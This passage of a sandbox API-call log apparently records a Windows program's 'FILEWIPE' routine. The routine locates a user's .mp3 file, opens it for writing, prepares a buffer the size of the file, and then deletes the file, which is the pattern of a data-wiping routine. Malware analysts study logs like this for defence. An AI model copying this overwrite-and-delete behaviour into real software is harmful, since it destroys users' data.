wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.970] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.970] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0037.970] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.970] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.970] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa51e1a00, ftCreationTime.dwHighDateTime=0x1d5b89c, ftLastAccessTime.dwLowDateTime=0x731a870, ftLastAccessTime.dwHighDateTime=0x1d5b91e, ftLastWriteTime.dwLowDateTime=0x731a870, ftLastWriteTime.dwHighDateTime=0x1d5b91e, nFileSizeHigh=0x0, nFileSizeLow=0x3d1d, dwReserved0=0x0, dwReserved1=0x777648, cFileName="fxfiITiq48pQW.mp3", cAlternateFileName="FXFIIT~1.MP3")) returned 0x7c2240 [0037.970] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.970] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.970] CharLowerBuffW (in: lpsz="byte[15645]", cchLength=0xb | out: lpsz="byte[15645]") returned 0xb [0037.970] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.970] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0037.970] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.970] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0037.970] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0037.971] FreeLibrary (hLibModule=0x76b40000) returned 1 [0037.971] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.971] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0037.971] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.971] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.972] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.972] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0037.972] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.972] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\fxfiitiq48pqw.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0037.972] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.973] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.973] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.973] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.973] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.973] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.974] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.975] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.975] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0037.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.975] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.975] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.975] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0037.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0037.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0037.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0037.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0037.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.976] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.976] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.976] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.976] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3", lpFilePart=0x0) returned 0x42 [0037.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0037.976] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\fxfiitiq48pqw.mp3")) returned 0x20 [0037.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0037.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3948 [0037.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0037.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0037.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3948 | out: hHeap=0x770000) returned 1 [0037.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0037.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0037.977] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa51e1a00, ftCreationTime.dwHighDateTime=0x1d5b89c, ftLastAccessTime.dwLowDateTime=0x731a870, ftLastAccessTime.dwHighDateTime=0x1d5b91e, ftLastWriteTime.dwLowDateTime=0x1656d740, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x3d1d, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="fxfiITiq48pQW.mp3", cAlternateFileName="FXFIIT~1.MP3")) returned 0x7c2240 [0037.977] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\fxfiitiq48pqw.mp3")) returned 1 [0037.978] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa51e1a00, ftCreationTime.dwHighDateTime=0x1d5b89c, ftLastAccessTime.dwLowDateTime=0x731a870, ftLastAccessTime.dwHighDateTime=0x1d5b91e, ftLastWriteTime.dwLowDateTime=0x1656d740, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x3d1d, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="fxfiITiq48pQW.mp3", cAlternateFileName="FXFIIT~1.MP3")) returned 0 [0037.978] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0037.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0037.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0037.978] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 